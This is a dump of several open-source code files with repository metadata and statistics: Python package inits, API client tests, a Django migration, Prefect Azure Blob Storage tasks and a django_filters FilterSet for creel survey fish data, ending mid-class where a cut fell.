| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
dfb4c5e767016cd9c245b4f5a37516e8be3065f8
| 259
|
py
|
Python
|
src/simmate/calculators/vasp/workflows/nudged_elastic_band/__init__.py
|
laurenmm/simmate-1
|
c06b94c46919b01cda50f78221ad14f75c100a14
|
[
"BSD-3-Clause"
] | 9
|
2021-12-21T02:58:21.000Z
|
2022-01-25T14:00:06.000Z
|
src/simmate/calculators/vasp/workflows/nudged_elastic_band/__init__.py
|
laurenmm/simmate-1
|
c06b94c46919b01cda50f78221ad14f75c100a14
|
[
"BSD-3-Clause"
] | 51
|
2022-01-01T15:59:58.000Z
|
2022-03-26T21:25:42.000Z
|
src/simmate/calculators/vasp/workflows/nudged_elastic_band/__init__.py
|
laurenmm/simmate-1
|
c06b94c46919b01cda50f78221ad14f75c100a14
|
[
"BSD-3-Clause"
] | 7
|
2022-01-01T03:44:32.000Z
|
2022-03-29T19:59:27.000Z
|
# -*- coding: utf-8 -*-
from .all_paths import workflow as all_paths_workflow
from .single_path import workflow as single_path_workflow
from .from_endpoints import workflow as from_endpoints_workflow
from .from_images import workflow as from_images_workflow
| 37
| 63
| 0.833977
| 39
| 259
| 5.230769
| 0.333333
| 0.27451
| 0.313725
| 0.196078
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004367
| 0.11583
| 259
| 6
| 64
| 43.166667
| 0.886463
| 0.081081
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dfe0737bf6eeb4de83ec2d23233f9d64bb58bb5e
| 1,990
|
py
|
Python
|
test/.ipynb_checkpoints/test_tournament-checkpoint.py
|
fernanlukban/pantheon
|
4b3d7894dc7f72ba7b71bcb98e9d6dd4645d060a
|
[
"MIT"
] | 52
|
2018-04-24T15:30:02.000Z
|
2022-02-22T11:05:27.000Z
|
test/.ipynb_checkpoints/test_tournament-checkpoint.py
|
fernanlukban/pantheon
|
4b3d7894dc7f72ba7b71bcb98e9d6dd4645d060a
|
[
"MIT"
] | 8
|
2020-09-18T04:00:21.000Z
|
2022-03-22T00:01:20.000Z
|
test/.ipynb_checkpoints/test_tournament-checkpoint.py
|
fernanlukban/pantheon
|
4b3d7894dc7f72ba7b71bcb98e9d6dd4645d060a
|
[
"MIT"
] | 14
|
2019-01-03T13:09:36.000Z
|
2022-03-05T17:13:45.000Z
|
from .config import *
def test_providers():
try:
data = loop.run_until_complete(panth.registerProvider(tournament_region, tournament_url, stub))
except exc.Unauthorized as e:
pytest.skip("API key unauthorized for tournament")
except Exception as e:
print(e)
assert type(data) == int
def test_tournaments():
try:
data = loop.run_until_complete(panth.registerTournament(provider_id, tournament_name, stub))
except exc.Unauthorized as e:
pytest.skip("API key unauthorized for tournament")
except Exception as e:
print(e)
assert type(data) == int
def test_code():
data_input = {
"mapType": "SUMMONERS_RIFT",
"metadata": "",
"pickType": "BLIND_PICK",
"spectatorType": "NONE",
"teamSize": 5
}
try:
data = loop.run_until_complete(panth.createTournamentCode(tournament_id, data_input, 1, stub))
except exc.Unauthorized as e:
pytest.skip("API key unauthorized for tournament")
except Exception as e:
print(e)
assert type(data) == list
assert len(data) == 1
def test_multiple_codes():
data_input = {
"mapType": "SUMMONERS_RIFT",
"metadata": "",
"pickType": "BLIND_PICK",
"spectatorType": "NONE",
"teamSize": 5
}
try:
data = loop.run_until_complete(panth.createTournamentCode(tournament_id, data_input, 5, stub))
except exc.Unauthorized as e:
pytest.skip("API key unauthorized for tournament")
except Exception as e:
print(e)
assert type(data) == list
assert len(data) == 5
def test_lobby():
try:
data = loop.run_until_complete(panth.getLobbyEvents(provider_id, stub))
except exc.Unauthorized as e:
pytest.skip("API key unauthorized for tournament")
except Exception as e:
print(e)
assert "eventList" in data
assert type(data["eventList"]) == list
| 27.638889
| 103
| 0.628141
| 233
| 1,990
| 5.23176
| 0.261803
| 0.02461
| 0.045119
| 0.057424
| 0.806399
| 0.806399
| 0.806399
| 0.727646
| 0.727646
| 0.727646
| 0
| 0.004104
| 0.265327
| 1,990
| 72
| 104
| 27.638889
| 0.829685
| 0
| 0
| 0.706897
| 0
| 0
| 0.169262
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 1
| 0.086207
| false
| 0
| 0.017241
| 0
| 0.103448
| 0.086207
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dffd4cb39c8478c3d645841c8b497e789e077f61
| 1,916
|
py
|
Python
|
src/magazine/migrations/0003_auto_20160114_1432.py
|
Busaka/excellence
|
1cd19770285584d61aeddd77d6c1dd83e2fd04ba
|
[
"MIT"
] | null | null | null |
src/magazine/migrations/0003_auto_20160114_1432.py
|
Busaka/excellence
|
1cd19770285584d61aeddd77d6c1dd83e2fd04ba
|
[
"MIT"
] | null | null | null |
src/magazine/migrations/0003_auto_20160114_1432.py
|
Busaka/excellence
|
1cd19770285584d61aeddd77d6c1dd83e2fd04ba
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-01-14 14:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('magazine', '0002_auto_20160114_1415'),
]
operations = [
migrations.AddField(
model_name='article',
name='h2_paragraph_eleven',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='article',
name='h2_paragraph_twelve',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='article',
name='h3_paragraph_eleven',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='article',
name='h3_paragraph_twelve',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='article',
name='h4_paragraph_eleven',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='article',
name='h4_paragraph_twelve',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='article',
name='h5_paragraph_eleven',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='article',
name='h5_paragraph_twelve',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='article',
name='h6_paragraph_eleven',
field=models.TextField(blank=True),
),
migrations.AddField(
model_name='article',
name='h6_paragraph_twelve',
field=models.TextField(blank=True),
),
]
| 29.030303
| 48
| 0.557933
| 176
| 1,916
| 5.857955
| 0.261364
| 0.174588
| 0.223084
| 0.261882
| 0.814743
| 0.814743
| 0.814743
| 0.780795
| 0.740058
| 0.740058
| 0
| 0.031956
| 0.330376
| 1,916
| 65
| 49
| 29.476923
| 0.771629
| 0.033925
| 0
| 0.689655
| 1
| 0
| 0.157468
| 0.012446
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034483
| 0
| 0.086207
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5f112059bdc99ece0bdb018cc3c05cd65e6c8299
| 212
|
py
|
Python
|
mmrotate/core/patch/__init__.py
|
Justice-Eternal/mmrotate
|
c5bf348562fd84cc17906c2cf370d1a49fcd3035
|
[
"Apache-2.0"
] | 449
|
2022-02-18T08:26:58.000Z
|
2022-03-31T11:58:32.000Z
|
mmrotate/core/patch/__init__.py
|
Justice-Eternal/mmrotate
|
c5bf348562fd84cc17906c2cf370d1a49fcd3035
|
[
"Apache-2.0"
] | 162
|
2022-02-18T09:54:46.000Z
|
2022-03-31T15:40:46.000Z
|
mmrotate/core/patch/__init__.py
|
Justice-Eternal/mmrotate
|
c5bf348562fd84cc17906c2cf370d1a49fcd3035
|
[
"Apache-2.0"
] | 98
|
2022-02-18T08:28:48.000Z
|
2022-03-31T08:52:11.000Z
|
# Copyright (c) OpenMMLab. All rights reserved.
from .merge_results import merge_results
from .split import get_multiscale_patch, slide_window
__all__ = ['merge_results', 'get_multiscale_patch', 'slide_window']
| 35.333333
| 67
| 0.806604
| 28
| 212
| 5.642857
| 0.571429
| 0.227848
| 0.227848
| 0.291139
| 0.367089
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103774
| 212
| 5
| 68
| 42.4
| 0.831579
| 0.212264
| 0
| 0
| 0
| 0
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5f240e813277187c28fe1df764f4d1bbc0e1c0e4
| 297
|
py
|
Python
|
tests/parser/choice.5.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/choice.5.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/choice.5.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
% This would (have) trigger(ed) inferences from dynamic constraints.
x | y.
a :- not x.
b :- not x.
c :- b.
a :- not c.
"""
output = """
% This would (have) trigger(ed) inferences from dynamic constraints.
x | y.
a :- not x.
b :- not x.
c :- b.
a :- not c.
"""
| 12.913043
| 69
| 0.52862
| 46
| 297
| 3.413043
| 0.369565
| 0.101911
| 0.165605
| 0.254777
| 0.929936
| 0.929936
| 0.929936
| 0.929936
| 0.929936
| 0.929936
| 0
| 0
| 0.289562
| 297
| 22
| 70
| 13.5
| 0.744076
| 0
| 0
| 0.875
| 0
| 0
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5f351157258d99eb646bcddf794c94291a783d05
| 9,492
|
py
|
Python
|
src/prefect/tasks/azure/blobstorage.py
|
dazzag24/prefect
|
9d36c989c95cbbed091b071932553286edf25bb6
|
[
"Apache-2.0"
] | null | null | null |
src/prefect/tasks/azure/blobstorage.py
|
dazzag24/prefect
|
9d36c989c95cbbed091b071932553286edf25bb6
|
[
"Apache-2.0"
] | null | null | null |
src/prefect/tasks/azure/blobstorage.py
|
dazzag24/prefect
|
9d36c989c95cbbed091b071932553286edf25bb6
|
[
"Apache-2.0"
] | null | null | null |
import uuid
import azure.storage.blob
from prefect import Task
from prefect.client import Secret
from prefect.utilities.tasks import defaults_from_attrs
class BlobStorageDownload(Task):
"""
Task for downloading data from an Blob Storage container and returning it as a string.
Note that all initialization arguments can optionally be provided or overwritten at runtime.
Args:
- azure_credentials_secret (str, optional): the name of the Prefect Secret
that stores your Azure credentials; this Secret must be a JSON string
with two keys: `ACCOUNT_NAME` and `ACCOUNT_KEY`
- container (str, optional): the name of the Azure Blob Storage to download from
- **kwargs (dict, optional): additional keyword arguments to pass to the
Task constructor
"""
def __init__(
self,
azure_credentials_secret: str = "AZ_CREDENTIALS",
container: str = None,
**kwargs
) -> None:
self.azure_credentials_secret = azure_credentials_secret
self.container = container
super().__init__(**kwargs)
@defaults_from_attrs("azure_credentials_secret", "container")
def run(
self,
blob_name: str,
azure_credentials_secret: str = "AZ_CREDENTIALS",
container: str = None,
) -> str:
"""
Task run method.
Args:
- blob_name (str): the name of the blob within this container to retrieve
- azure_credentials_secret (str, optional): the name of the Prefect Secret
that stores your Azure credentials; this Secret must be a JSON string
with two keys: `ACCOUNT_NAME` and `ACCOUNT_KEY`
- container (str, optional): the name of the Blob Storage container to download from
Returns:
- str: the contents of this blob_name / container, as a string
"""
if container is None:
raise ValueError("A container name must be provided.")
# get Azure credentials
azure_credentials = Secret(azure_credentials_secret).get()
az_account_name = azure_credentials["ACCOUNT_NAME"]
if 'ACCOUNT_KEY' in azure_credentials:
az_account_key = azure_credentials["ACCOUNT_KEY"]
elif 'SAS_TOKEN' in azure_credentials:
az_sas_token = azure_credentials["SAS_TOKEN"]
else:
raise ValueError("One of either ACCOUNT_KEY or SAS_TOKEN must be provided in the azure_credentials_secret.")
if az_sas_token is None:
blob_service = azure.storage.blob.BlockBlobService(
account_name=az_account_name, account_key=az_account_key
)
else:
blob_service = azure.storage.blob.BlockBlobService(
account_name=az_account_name, sas_token=az_sas_token
)
blob_result = blob_service.get_blob_to_text(
container_name=container, blob_name=blob_name
)
content_string = blob_result.content
return content_string
class BlobStorageUpload(Task):
"""
Task for uploading string data (e.g., a JSON string) to an Azure Blob Storage container.
Note that all initialization arguments can optionally be provided or overwritten at runtime.
Args:
- azure_credentials_secret (str, optional): the name of the Prefect Secret
that stores your Azure credentials; this Secret must be a JSON string
with two keys: `ACCOUNT_NAME` and `ACCOUNT_KEY`
- container (str, optional): the name of the Azure Blob Storage to upload to
- **kwargs (dict, optional): additional keyword arguments to pass to the
Task constructor
"""
def __init__(
self,
azure_credentials_secret: str = "AZ_CREDENTIALS",
container: str = None,
**kwargs
) -> None:
self.azure_credentials_secret = azure_credentials_secret
self.container = container
super().__init__(**kwargs)
@defaults_from_attrs("azure_credentials_secret", "container")
def run(
self,
data: str,
blob_name: str = None,
azure_credentials_secret: str = "AZ_CREDENTIALS",
container: str = None,
) -> str:
"""
Task run method.
Args:
- data (str): the data payload to upload
- blob_name (str, optional): the name to upload the data under; if not
provided, a random `uuid` will be created
- azure_credentials_secret (str, optional): the name of the Prefect Secret
that stores your Azure credentials; this Secret must be a JSON string
with two keys: `ACCOUNT_NAME` and `ACCOUNT_KEY`
- container (str, optional): the name of the Blob Storage container to upload to
Returns:
- str: the name of the blob the data payload was uploaded to
"""
if container is None:
raise ValueError("A container name must be provided.")
## get Azure credentials
azure_credentials = Secret(azure_credentials_secret).get()
az_account_name = azure_credentials["ACCOUNT_NAME"]
if 'ACCOUNT_KEY' in azure_credentials:
az_account_key = azure_credentials["ACCOUNT_KEY"]
elif 'SAS_TOKEN' in azure_credentials:
az_sas_token = azure_credentials["SAS_TOKEN"]
else:
raise ValueError("One of either ACCOUNT_KEY or SAS_TOKEN must be provided in the azure_credentials_secret.")
if az_sas_token is None:
blob_service = azure.storage.blob.BlockBlobService(
account_name=az_account_name, account_key=az_account_key
)
else:
blob_service = azure.storage.blob.BlockBlobService(
account_name=az_account_name, sas_token=az_sas_token
)
## create key if not provided
if blob_name is None:
blob_name = str(uuid.uuid4())
blob_service.create_blob_from_text(
container_name=container, blob_name=blob_name, text=data
)
return blob_name
class BlobStorageCopy(Task):
"""
Task for copying a blob object to the same or new Azure Blob Storage container.
Note that all initialization arguments can optionally be provided or overwritten at runtime.
Args:
- azure_credentials_secret (str, optional): the name of the Prefect Secret
that stores your Azure credentials; this Secret must be a JSON string
with two keys: `ACCOUNT_NAME` and `ACCOUNT_KEY`
- container (str, optional): the name of the Azure Blob Storage to upload to
- **kwargs (dict, optional): additional keyword arguments to pass to the
Task constructor
"""
def __init__(
self,
azure_credentials_secret: str = "AZ_CREDENTIALS",
container: str = None,
**kwargs
) -> None:
self.azure_credentials_secret = azure_credentials_secret
self.container = container
super().__init__(**kwargs)
@defaults_from_attrs("azure_credentials_secret", "container")
def run(
self,
blob_name: str = None,
target_blob_name: str = None,
azure_credentials_secret: str = "AZ_CREDENTIALS",
container: str = None,
target_container: str = None
) -> str:
"""
Task run method.
Args:
- blob_name (str, optional): the name to upload the data under; if not
provided, a random `uuid` will be created
- azure_credentials_secret (str, optional): the name of the Prefect Secret
that stores your Azure credentials; this Secret must be a JSON string
with two keys: `ACCOUNT_NAME` and `ACCOUNT_KEY`
- container (str, optional): the name of the Blob Storage container to upload to
Returns:
- str: the name of the blob the data payload was uploaded to
"""
if container is None:
raise ValueError("A container name must be provided.")
## get Azure credentials
azure_credentials = Secret(azure_credentials_secret).get()
az_account_name = azure_credentials["ACCOUNT_NAME"]
if 'ACCOUNT_KEY' in azure_credentials:
az_account_key = azure_credentials["ACCOUNT_KEY"]
elif 'SAS_TOKEN' in azure_credentials:
az_sas_token = azure_credentials["SAS_TOKEN"]
else:
raise ValueError("One of either ACCOUNT_KEY or SAS_TOKEN must be provided in the azure_credentials_secret.")
if az_sas_token is None:
blob_service = azure.storage.blob.BlockBlobService(
account_name=az_account_name, account_key=az_account_key
)
else:
blob_service = azure.storage.blob.BlockBlobService(
account_name=az_account_name, sas_token=az_sas_token
)
if target_container is None:
target_container = container
blob_url = blob_service.make_blob_url(container, blob_name)
print("Copying from {} to {}/{}".format(blob_url, target_container, target_blob_name))
blob_service.copy_blob(
target_container,
target_blob_name,
blob_url
#f"https://{az_account_name}.blob.core.windows.net/{container}/{blob_name}"
)
return target_blob_name
| 38.274194
| 120
| 0.64075
| 1,145
| 9,492
| 5.082969
| 0.110044
| 0.148454
| 0.113402
| 0.030928
| 0.842096
| 0.842096
| 0.828007
| 0.828007
| 0.813574
| 0.813574
| 0
| 0.000149
| 0.291825
| 9,492
| 247
| 121
| 38.42915
| 0.865665
| 0.367994
| 0
| 0.708955
| 0
| 0
| 0.130997
| 0.026415
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044776
| false
| 0
| 0.037313
| 0
| 0.126866
| 0.007463
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a07d7dfc6af1a4630b4545bea05caab41974cdd4
| 211
|
py
|
Python
|
baselines/baselines_common/__init__.py
|
Shmuma/Run-Skeleton-Run
|
a953e6c524a444b6a99a54ef5b2886a57de0d185
|
[
"MIT"
] | 92
|
2017-11-16T00:51:27.000Z
|
2021-05-09T14:09:08.000Z
|
baselines/baselines_common/__init__.py
|
bsivanantham/Run-Skeleton-Run
|
07e2ec2cffb638b03070422328faf07ab69c70bd
|
[
"MIT"
] | 4
|
2017-12-19T13:19:18.000Z
|
2018-02-26T12:18:11.000Z
|
baselines/baselines_common/__init__.py
|
bsivanantham/Run-Skeleton-Run
|
07e2ec2cffb638b03070422328faf07ab69c70bd
|
[
"MIT"
] | 18
|
2017-11-16T10:07:03.000Z
|
2021-10-15T04:26:48.000Z
|
from baselines.baselines_common.console_util import *
from baselines.baselines_common.dataset import Dataset
from baselines.baselines_common.math_util import *
from baselines.baselines_common.misc_util import *
| 42.2
| 54
| 0.872038
| 28
| 211
| 6.321429
| 0.321429
| 0.293785
| 0.497175
| 0.632768
| 0.429379
| 0.429379
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075829
| 211
| 4
| 55
| 52.75
| 0.907692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
a097b4c2e1a0d49f37ac0f9c33fcf1ba185d8f19
| 22,355
|
py
|
Python
|
creel_portal/api/filters/FishAttr_Filter.py
|
AdamCottrill/CreelPortal
|
5ec867c4f11b4231c112e8209116b6b96c2830ec
|
[
"MIT"
] | null | null | null |
creel_portal/api/filters/FishAttr_Filter.py
|
AdamCottrill/CreelPortal
|
5ec867c4f11b4231c112e8209116b6b96c2830ec
|
[
"MIT"
] | null | null | null |
creel_portal/api/filters/FishAttr_Filter.py
|
AdamCottrill/CreelPortal
|
5ec867c4f11b4231c112e8209116b6b96c2830ec
|
[
"MIT"
] | null | null | null |
import django_filters
from .filter_utils import ValueInFilter
class FishAttrFilters(django_filters.FilterSet):
"""A filter set that contains filters that are common to all the FN125 child
tables - FN125Lamprey, FN125Tag, Fn126, and FN127. Filtersets for those class
inherit from this one, and add their own models and model specific filters.
Filters in this class include filters from FN011 to FN125 Tables,
plus those associated with the design tables.
"""
tlen = django_filters.NumberFilter(
field_name="fish__tlen"
) # , lookup_expr="exact")
tlen__gte = django_filters.NumberFilter(field_name="fish__tlen", lookup_expr="gte")
tlen__lte = django_filters.NumberFilter(field_name="fish__tlen", lookup_expr="lte")
tlen__gt = django_filters.NumberFilter(field_name="fish__tlen", lookup_expr="gt")
tlen__lt = django_filters.NumberFilter(field_name="fish__tlen", lookup_expr="lt")
flen = django_filters.NumberFilter(field_name="fish__flen")
flen__gte = django_filters.NumberFilter(field_name="fish__flen", lookup_expr="gte")
flen__lte = django_filters.NumberFilter(field_name="fish__flen", lookup_expr="lte")
flen__gt = django_filters.NumberFilter(field_name="fish__flen", lookup_expr="gt")
flen__lt = django_filters.NumberFilter(field_name="fish__flen", lookup_expr="lt")
rwt = django_filters.NumberFilter(field_name="fish__rwt")
rwt__null = django_filters.BooleanFilter(
field_name="fish__rwt", lookup_expr="isnull"
)
rwt__gte = django_filters.NumberFilter(field_name="fish__rwt", lookup_expr="gte")
rwt__lte = django_filters.NumberFilter(field_name="fish__rwt", lookup_expr="lte")
rwt__gt = django_filters.NumberFilter(field_name="fish__rwt", lookup_expr="gt")
rwt__lt = django_filters.NumberFilter(field_name="fish__rwt", lookup_expr="lt")
mat = ValueInFilter(field_name="fish__mat")
mat__not = ValueInFilter(field_name="fish__mat", exclude=True)
mat__null = django_filters.BooleanFilter(
field_name="fish__mat", lookup_expr="isnull"
)
gon = ValueInFilter(field_name="fish__gon")
gon__not = ValueInFilter(field_name="fish__gon", exclude=True)
gon__null = django_filters.BooleanFilter(
field_name="fish__gon", lookup_expr="isnull"
)
sex = ValueInFilter(field_name="fish__sex")
sex__not = ValueInFilter(field_name="fish__sex", exclude=True)
sex__null = django_filters.BooleanFilter(
field_name="fish__sex", lookup_expr="isnull"
)
clipc = ValueInFilter(field_name="fish__clipc")
clipc__not = ValueInFilter(field_name="fish__clipc", exclude=True)
clipc__null = django_filters.BooleanFilter(
field_name="fish__clipc", lookup_expr="isnull"
)
clipc__like = django_filters.CharFilter(
field_name="fish__clipc", lookup_expr="icontains"
)
clipc__not_like = django_filters.CharFilter(
field_name="fish__clipc", lookup_expr="icontains", exclude=True
)
fate = ValueInFilter(field_name="fish__fate")
fate__not = ValueInFilter(field_name="fish__fate", exclude=True)
fate__null = django_filters.BooleanFilter(
field_name="fish__fate", lookup_expr="isnull"
)
agest__like = django_filters.CharFilter(
field_name="fish__agest", lookup_expr="icontains"
)
# CATCH ATTRIBUTES
spc = ValueInFilter(field_name="fish__catch__species__spc")
spc__not = ValueInFilter(field_name="fish__catch__species__spc", exclude=True)
grp = ValueInFilter(field_name="fish__catch__grp")
grp__not = ValueInFilter(field_name="fish__catch__grp", exclude=True)
sek = django_filters.BooleanFilter(field_name="fish__catch__sek")
hsvcnt = django_filters.CharFilter(
field_name="fish__catch__hsvcnt", lookup_expr="exact"
)
hsvcnt__gte = django_filters.NumberFilter(
field_name="fish__catch__hsvcnt", lookup_expr="gte"
)
hsvcnt__lte = django_filters.NumberFilter(
field_name="fish__catch__hsvcnt", lookup_expr="lte"
)
hsvcnt__gt = django_filters.NumberFilter(
field_name="fish__catch__hsvcnt", lookup_expr="gt"
)
hsvcnt__lt = django_filters.NumberFilter(
field_name="fish__catch__hsvcnt", lookup_expr="lt"
)
rlscnt = django_filters.CharFilter(
field_name="fish__catch__rlscnt", lookup_expr="exact"
)
rlscnt__gte = django_filters.NumberFilter(
field_name="fish__catch__rlscnt", lookup_expr="gte"
)
rlscnt__lte = django_filters.NumberFilter(
field_name="fish__catch__rlscnt", lookup_expr="lte"
)
rlscnt__gt = django_filters.NumberFilter(
field_name="fish__catch__rlscnt", lookup_expr="gt"
)
rlscnt__lt = django_filters.NumberFilter(
field_name="fish__catch__rlscnt", lookup_expr="lt"
)
mescnt = django_filters.CharFilter(
field_name="fish__catch__mescnt", lookup_expr="exact"
)
mescnt__gte = django_filters.NumberFilter(
field_name="fish__catch__mescnt", lookup_expr="gte"
)
mescnt__lte = django_filters.NumberFilter(
field_name="fish__catch__mescnt", lookup_expr="lte"
)
mescnt__gt = django_filters.NumberFilter(
field_name="fish__catch__mescnt", lookup_expr="gt"
)
mescnt__lt = django_filters.NumberFilter(
field_name="fish__catch__mescnt", lookup_expr="lt"
)
# INTERVIEW ATTRIBUTES:
itvtm0 = django_filters.TimeFilter(
field_name="fish__catch__interview__itvtm0", help_text="format: HH:MM"
)
itvtm0__gte = django_filters.TimeFilter(
field_name="fish__catch__interview__itvtm0",
lookup_expr="gte",
help_text="format: HH:MM",
)
itvtm0__lte = django_filters.TimeFilter(
field_name="fish__catch__interview__itvtm0",
lookup_expr="lte",
help_text="format: HH:MM",
)
itvtm0__gt = django_filters.TimeFilter(
field_name="fish__catch__interview__itvtm0",
lookup_expr="gt",
help_text="format: HH:MM",
)
itvtm0__lt = django_filters.TimeFilter(
field_name="fish__catch__interview__itvtm0",
lookup_expr="lt",
help_text="format: HH:MM",
)
efftm0 = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm0", help_text="format: HH:MM"
)
efftm0__gte = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm0",
lookup_expr="gte",
help_text="format: HH:MM",
)
efftm0__lte = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm0",
lookup_expr="lte",
help_text="format: HH:MM",
)
efftm0__gt = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm0",
lookup_expr="gt",
help_text="format: HH:MM",
)
efftm0__lt = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm0",
lookup_expr="lt",
help_text="format: HH:MM",
)
efftm1 = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm1", help_text="format: HH:MM"
)
efftm1__gte = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm1",
lookup_expr="gte",
help_text="format: HH:MM",
)
efftm1__lte = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm1",
lookup_expr="lte",
help_text="format: HH:MM",
)
efftm1__gt = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm1",
lookup_expr="gt",
help_text="format: HH:MM",
)
efftm1__lt = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm1",
lookup_expr="lt",
help_text="format: HH:MM",
)
date = django_filters.DateFilter(
field_name="fish__catch__interview__date", help_text="format: yyyy-mm-dd"
)
date__gte = django_filters.DateFilter(
field_name="fish__catch__interview__date",
lookup_expr="gte",
help_text="format: yyyy-mm-dd",
)
date__lte = django_filters.DateFilter(
field_name="fish__catch__interview__date",
lookup_expr="lte",
help_text="format: yyyy-mm-dd",
)
date__gt = django_filters.DateFilter(
field_name="fish__catch__interview__date",
lookup_expr="gt",
help_text="format: yyyy-mm-dd",
)
date__lt = django_filters.DateFilter(
field_name="fish__catch__interview__date",
lookup_expr="lt",
help_text="format: yyyy-mm-dd",
)
persons = django_filters.CharFilter(
field_name="fish__catch__interview__persons", lookup_expr="exact"
)
persons__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__persons", lookup_expr="gte"
)
persons__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__persons", lookup_expr="lte"
)
persons__gt = django_filters.NumberFilter(
field_name="fish__catch__interview__persons", lookup_expr="gt"
)
persons__lt = django_filters.NumberFilter(
field_name="fish__catch__interview__persons", lookup_expr="lt"
)
anglers = django_filters.CharFilter(
field_name="fish__catch__interview__anglers", lookup_expr="exact"
)
anglers__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__anglers", lookup_expr="gte"
)
anglers__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__anglers", lookup_expr="lte"
)
anglers__gt = django_filters.NumberFilter(
field_name="fish__catch__interview__anglers", lookup_expr="gt"
)
anglers__lt = django_filters.NumberFilter(
field_name="fish__catch__interview__anglers", lookup_expr="lt"
)
rods = django_filters.CharFilter(
field_name="fish__catch__interview__rods", lookup_expr="exact"
)
rods__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__rods", lookup_expr="gte"
)
rods__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__rods", lookup_expr="lte"
)
rods__gt = django_filters.NumberFilter(
field_name="fish__catch__interview__rods", lookup_expr="gt"
)
rods__lt = django_filters.NumberFilter(
